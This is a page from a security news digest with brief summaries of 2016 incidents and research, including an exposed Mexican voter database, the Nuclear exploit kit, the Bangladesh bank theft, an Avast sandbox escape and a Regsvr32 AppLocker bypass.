Security Alerts & News
by Tymoteusz A. Góral

History
#646 MongoDB configuration error exposed 93 million Mexican voter records
A 132 GB database, containing the personal information on 93.4 million Mexican voters has finally been taken offline. The database sat exposed to the public for at least eight days after its discovery by researcher Chris Vickery, but originally went public in September 2015.

Vickery, who works as a security researcher at Kromtech (the company behind MacKeeper), discovered the MongoDB instance on April 14, but had difficulty tracking down the person or company responsible for placing the voter data on Amazon's AWS. He first reached out to the U.S. State Department, as well as the Mexican Embassy, but had little success.
#645 MIT launches experimental bug bounty program
The effectiveness of bug bounty programs is difficult to deny, especially after adoption of one at Uber, which announced last month it would begin paying $10,000 for critical bugs, and the Department of Defense, whose Hack the Pentagon illustrates the government’s softening stance on hackers.

The Massachusetts Institute of Technology announced this week that it will follow in those footsteps and launch its own experimental bug bounty program, becoming one of the first academic institutions to reward hackers who find and responsibly disclose vulnerabilities on the school’s sites.
#644 “Nuclear” exploit kit service cashes in on demand from cryptoransomware rings
Security researchers at Cisco Talos and Check Point have published reports detailing the inner workings of Nuclear, an "exploit kit" Web service that deployed malware onto victims' computers through malicious websites. While a significant percentage of Nuclear's infrastructure has been recently disrupted, the exploit kit is still operating—and looks to be a major contributor to the current crypto-ransomware epidemic.

Introduced in 2010, Nuclear has been used to target millions of victims worldwide, giving attackers the ability to tailor their attacks to specific locations and computer configurations. Though not as widely used as the well-known Angler exploit kit, it has been responsible for dropping Locky and other crypto-ransomware onto more than 140,000 computers in more than 200 countries, according to statistics collected by Check Point. The Locky campaign appeared to be placing the greatest demand on the Nuclear pay-to-exploit service.
#643 $10 router blamed in Bangladesh bank hack
Hackers managed to steal $80m (£56m) from Bangladesh's central bank because it skimped on network hardware and security software, reports Reuters.

The bank had no firewall and used second-hand routers that cost $10 to connect to global financial networks.

Better security and hardware would have hampered the attackers, Reuters said, quoting an official investigator.

The hackers aimed to steal $1bn but made mistakes that led to the theft being spotted and stopped.
#642 PowerShell used for spreading Trojan.Laziok through Google Docs
Through our multi-flow detection capability, we recently identified malicious actors spreading Trojan.Laziok malware via Google Docs. We observed that the attackers managed to upload the payload to Google Docs in March 2016. During the brief time it was live, users accessing the malicious page from Internet Explorer (versions 3 to 11) would have become the unwilling hosts for the infostealer payload without any security warning. After we alerted Google about its presence, they quickly cleaned it and the original URL involved in propagation also went down.
#641 Avast SandBox escape via IOCTL requests
A design flaw in Avast Sandbox allows a potentially harmful program to escape the sandbox and infect the host by dropping its files out of it and/or by modifying existing legitimate files of any type.

Affected Products:

Avast Internet Security v11.x.x
Avast Pro Antivirus v11.x.x
Avast Premier v11.x.x
Avast Free Antivirus v11.x.x

Avast Business Security v11.x.x

Avast Endpoint Protection v8.x.x
Avast Endpoint Protection Plus v8.x.x
Avast Endpoint Protection Suite v8.x.x
Avast Endpoint Protection Suite Plus v8.x.x
Avast File Server Security v8.x.x
Avast Email Server Security v8.x.x
#640 How I hacked Facebook, and found someone's backdoor script
As a pentester, I love server-side vulnerabilities more than client-side ones. Why? Because it’s way much cooler to take over the server directly and gain system SHELL privileges.

Of course, both vulnerabilities from the server-side and the client-side are indispensable in a perfect penetration test. Sometimes, in order to take over the server more elegantly, it also need some client-side vulnerabilities to do the trick. But speaking of finding vulnerabilities, I prefer to find server-side vulnerabilities first.

With the growing popularity of Facebook around the world, I’ve always been interested in testing the security of Facebook. Luckily, in 2012, Facebook launched the Bug Bounty Program, which even motivated me to give it a shot.
#639 Core Windows utility can be used to bypass AppLocker
A core Windows command-line utility, Regsvr32, used to register DLLs to the Windows Registry can be abused to run remote code from the Internet, bypassing whitelisting protections such as Microsoft’s AppLocker.

A researcher who requested anonymity found and privately disclosed the issue to Microsoft on Tuesday. It’s unknown whether Microsoft will patch this issue with a security bulletin, or in a future release.

Regsvr32, also known as Microsoft Register Server, is a Microsoft-signed binary that runs as default on Windows. The researcher’s proof-of-concept allows him to download and run JavaScript or VBScript from a URL provided via the command line. Abusing this situation presumes an attacker would already be present on the box, the researcher said.
History
2017: 01 02 03 04 05
2016: 01 02 03 04 05 06 07 08 09 10 11 12